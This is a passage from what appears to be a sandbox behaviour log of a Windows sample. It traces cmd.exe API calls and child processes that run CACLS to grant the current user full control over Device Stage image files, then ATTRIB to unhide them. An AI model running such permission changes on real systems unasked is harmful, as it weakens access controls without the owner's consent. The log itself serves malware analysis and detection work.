lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0148.535] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0148.536] GetConsoleTitleW (in: lpConsoleTitle=0x2109f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.536] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0148.536] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0148.536] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0148.536] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0148.537] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0148.538] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0148.538] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0148.538] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0148.538] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0148.538] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0148.538] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0148.538] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0148.543] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0148.543] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0148.543] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0148.543] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0148.543] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0148.543] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0148.543] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0148.548] SetErrorMode (uMode=0x0) returned 0x0 [0148.549] SetErrorMode (uMode=0x1) returned 0x0 [0148.549] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x222010, lpFilePart=0x1ef244 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", 
lpFilePart=0x1ef244*="Desktop") returned 0x18 [0148.549] SetErrorMode (uMode=0x0) returned 0x1 [0148.549] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0148.549] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0148.554] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0148.555] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0xffffffff [0148.555] GetLastError () returned 0x2 [0148.555] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0xffffffff [0148.555] GetLastError () returned 0x2 [0148.555] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0x210f48 [0148.556] FindClose (in: hFindFile=0x210f48 | out: hFindFile=0x210f48) returned 1 [0148.556] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0xffffffff [0148.556] GetLastError () returned 0x2 [0148.556] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0x210f48 [0148.556] FindClose (in: hFindFile=0x210f48 | out: 
hFindFile=0x210f48) returned 1 [0148.556] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0148.556] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0148.556] GetConsoleTitleW (in: lpConsoleTitle=0x1ef4b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.556] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef340, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef408 | out: lpAttributeList=0x1ef340, lpSize=0x1ef408) returned 1 [0148.556] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef340, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef400, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef340, lpPreviousValue=0x0) returned 1 [0148.556] GetStartupInfoW (in: lpStartupInfo=0x1ef2fc | out: lpStartupInfo=0x1ef2fc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0148.557] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0148.558] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1ef39c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, 
lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef3e8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1ef3e8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xbb8, dwThreadId=0xb9c)) returned 1 [0148.561] CloseHandle (hObject=0x4c) returned 1 [0148.561] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0148.561] GetEnvironmentStringsW () returned 0x2204d8* [0148.562] FreeEnvironmentStringsW (penv=0x2204d8) returned 1 [0148.562] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0148.603] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1ef2dc | out: lpExitCode=0x1ef2dc*=0x0) returned 1 [0148.603] CloseHandle (hObject=0x50) returned 1 [0148.603] _vsnwprintf (in: _Buffer=0x1ef424, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef2e8 | out: _Buffer="00000000") returned 8 [0148.603] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0148.603] GetEnvironmentStringsW () returned 0x2222f8* [0148.603] FreeEnvironmentStringsW (penv=0x2222f8) returned 1 [0148.603] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0148.604] GetEnvironmentStringsW () returned 0x2222f8* [0148.604] FreeEnvironmentStringsW (penv=0x2222f8) returned 1 [0148.604] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef340 | out: lpAttributeList=0x1ef340) [0148.604] GetConsoleTitleW (in: lpConsoleTitle=0x1ef724, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.604] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0148.604] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0148.604] GetEnvironmentVariableW (in: 
lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0148.604] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0xffffffff [0148.605] GetLastError () returned 0x2 [0148.605] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0xffffffff [0148.605] GetLastError () returned 0x2 [0148.605] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0x210f48 [0148.605] FindClose (in: hFindFile=0x210f48 | out: hFindFile=0x210f48) returned 1 [0148.605] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0xffffffff [0148.605] GetLastError () returned 0x2 [0148.605] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1eefc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eefc0) returned 0x210f48 [0148.605] FindClose (in: hFindFile=0x210f48 | out: hFindFile=0x210f48) returned 1 [0148.606] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0148.606] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0148.606] GetConsoleTitleW (in: lpConsoleTitle=0x1ef4b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0148.606] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef340, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef408 | out: 
lpAttributeList=0x1ef340, lpSize=0x1ef408) returned 1 [0148.606] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef340, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef400, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef340, lpPreviousValue=0x0) returned 1 [0148.606] GetStartupInfoW (in: lpStartupInfo=0x1ef2fc | out: lpStartupInfo=0x1ef2fc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0148.606] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0148.606] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1ef39c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef3e8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"", lpProcessInformation=0x1ef3e8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb90, dwThreadId=0xc0c)) returned 1 [0148.608] CloseHandle (hObject=0x50) returned 1 [0148.608] SetEnvironmentVariableW (lpName="COPYCMD", 
lpValue=0x0) returned 1 [0148.608] GetEnvironmentStringsW () returned 0x222458* [0148.608] FreeEnvironmentStringsW (penv=0x222458) returned 1 [0148.608] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0148.771] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1ef2dc | out: lpExitCode=0x1ef2dc*=0x0) returned 1 [0148.772] CloseHandle (hObject=0x4c) returned 1 [0148.772] _vsnwprintf (in: _Buffer=0x1ef424, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef2e8 | out: _Buffer="00000000") returned 8 [0148.772] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0148.772] GetEnvironmentStringsW () returned 0x222458* [0148.772] FreeEnvironmentStringsW (penv=0x222458) returned 1 [0148.772] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0148.772] GetEnvironmentStringsW () returned 0x222458* [0148.772] FreeEnvironmentStringsW (penv=0x222458) returned 1 [0148.772] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef340 | out: lpAttributeList=0x1ef340) [0148.772] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.772] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0148.772] _get_osfhandle (_FileHandle=1) returned 0x7 [0148.772] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0148.772] _get_osfhandle (_FileHandle=0) returned 0x3 [0148.772] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0148.772] SetConsoleInputExeNameW () returned 0x1 [0148.772] GetConsoleOutputCP () returned 0x1b5 [0148.773] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0148.773] SetThreadUILanguage (LangId=0x0) returned 0x409 [0148.773] exit (_Code=0) Process: id = "222" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea167a0" os_pid = "0xbb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" 
parent_id = "221" os_parent_pid = "0xb3c" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18792 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18793 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18794 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18795 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 18796 start_va = 0x650000 end_va = 0x658fff entry_point = 0x650000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 18797 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18798 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18799 start_va = 0x7ffb0000 end_va = 0x7ffd2fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18800 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 18801 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18802 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18803 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18804 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18805 start_va = 0x1b0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18806 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 18807 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18808 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18809 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18810 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 
0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18811 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18812 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18813 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 281 os_tid = 0xb9c Thread: id = 282 os_tid = 0xb40 Process: id = "223" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167a0" os_pid = "0xb90" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "221" os_parent_pid = "0xb3c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18814 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18815 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = 
"" Region: id = 18816 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18817 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 18818 start_va = 0xb40000 end_va = 0xb46fff entry_point = 0xb40000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 18819 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18820 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18821 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18822 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 18823 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18824 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18825 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18826 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 
18827 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 18828 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 18829 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 18830 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18831 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18832 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18833 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18834 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18835 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18836 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = 
"user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18837 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18838 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18839 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18840 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18841 start_va = 0x150000 end_va = 0x217fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 18842 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18843 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 283 os_tid = 0xc0c Process: id = "224" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xb00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device 
Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18960 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18961 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18962 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18963 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = 